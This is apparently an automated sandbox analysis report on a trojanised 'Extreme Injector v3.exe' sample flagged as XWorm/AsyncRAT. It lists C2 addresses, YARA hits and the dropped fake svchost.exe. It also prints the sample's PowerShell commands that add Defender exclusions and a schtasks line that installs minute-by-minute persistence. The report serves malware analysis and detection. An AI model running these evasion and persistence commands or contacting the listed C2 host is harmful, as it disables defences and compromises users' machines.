Source: Extreme Injector v3.exe | String decryptor: XWorm V5.6
Source: Extreme Injector v3.exe | String decryptor: USB.exe
Source: Extreme Injector v3.exe | String decryptor: %AppData%
Source: Extreme Injector v3.exe | String decryptor: svchost.exe
Source: Extreme Injector v3.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Extreme Injector v3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49823 -> 147.185.221.24:43985
Source: Malware configuration extractor | URLs: or-officials.gl.at.ply.gg
Source: global traffic | TCP traffic: 147.185.221.24 ports 43985,3,4,5,8,9
Source: Yara match | File source: Extreme Injector v3.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49823 -> 147.185.221.24:43985
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 147.185.221.24
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: or-officials.gl.at.ply.gg
Source: powershell.exe, 00000004.00000002.1876687071.0000012E7A878000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
Source: powershell.exe, 00000001.00000002.1751532684.000001B2B9310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: Extreme Injector v3.exe, svchost.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://osoft.com/pki/ceooCerAut_2010-06
Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1876479990.0000012E7A812000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft.co
Source: powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
Source: powershell.exe, 0000000B.00000002.2293488165.000001655A8B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process information set: 01 00 00 00

System Summary

Source: Extreme Injector v3.exe, type: SAMPLE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: Extreme Injector v3.exe, type: SAMPLE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B896026
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B896DD2
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B8922F1
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B8916D9
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B8913FB
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B892059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B89947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8A206D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B9739D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B972E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B8913DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B892078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B9630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B8921FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B9630E9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 15_2_00007FFD9B8916D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 15_2_00007FFD9B890FF8
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 15_2_00007FFD9B892059
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 16_2_00007FFD9B8A16D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 16_2_00007FFD9B8A0FF8
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 16_2_00007FFD9B8A2059
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 18_2_00007FFD9B8916D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 18_2_00007FFD9B890FF8
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 18_2_00007FFD9B892059
Source: Extreme Injector v3.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Extreme Injector v3.exe, type: SAMPLE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: Extreme Injector v3.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Extreme Injector v3.exe, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Extreme Injector v3.exe, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Extreme Injector v3.exe, URBrdZkGMwzi2hbgw0arbLTlF7INR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, URBrdZkGMwzi2hbgw0arbLTlF7INR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, URBrdZkGMwzi2hbgw0arbLTlF7INR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Extreme Injector v3.exe, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Extreme Injector v3.exe, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.0.dr, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@20/20@2/2
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Mutant created: \Sessions\1\BaseNamedObjects\264q6Z2c7trpM79g
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apexu05t.db5.ps1
Source: Extreme Injector v3.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Extreme Injector v3.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Extreme Injector v3.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | File read: C:\Users\user\Desktop\Extreme Injector v3.exe
Source: unknown | Process created: C:\Users\user\Desktop\Extreme Injector v3.exe "C:\Users\user\Desktop\Extreme Injector v3.exe"
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
